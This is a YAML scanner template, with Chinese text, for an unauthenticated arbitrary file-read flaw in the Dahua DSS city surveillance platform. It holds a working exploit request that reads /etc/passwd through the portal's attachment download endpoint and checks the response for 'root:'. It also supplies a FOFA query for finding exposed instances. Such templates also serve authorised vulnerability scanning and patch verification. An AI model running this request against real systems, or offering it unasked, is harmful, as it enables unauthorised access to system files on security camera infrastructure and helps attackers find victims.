product: 大华DSS城市安防监控平台
vName: 大华DSS城市安防监控平台 任意文件读取
type: 文件读取
vID:
  - QVD-2023-20736
level: 3
vDesc: 大华城市安防监控系统平台 attachment_downloadByUrlAtt.action接口存在任意文件下载漏洞，未经身份验证的攻击者 可以获取系统内部敏感文件信息，使系统处于极不安全的状态。
version: ''
note: ''
search:
  FOFA: app="dahua-DSS"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/135965060
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/attachment_downloadByUrlAtt.response?filePath=file:///etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:'
            logic: and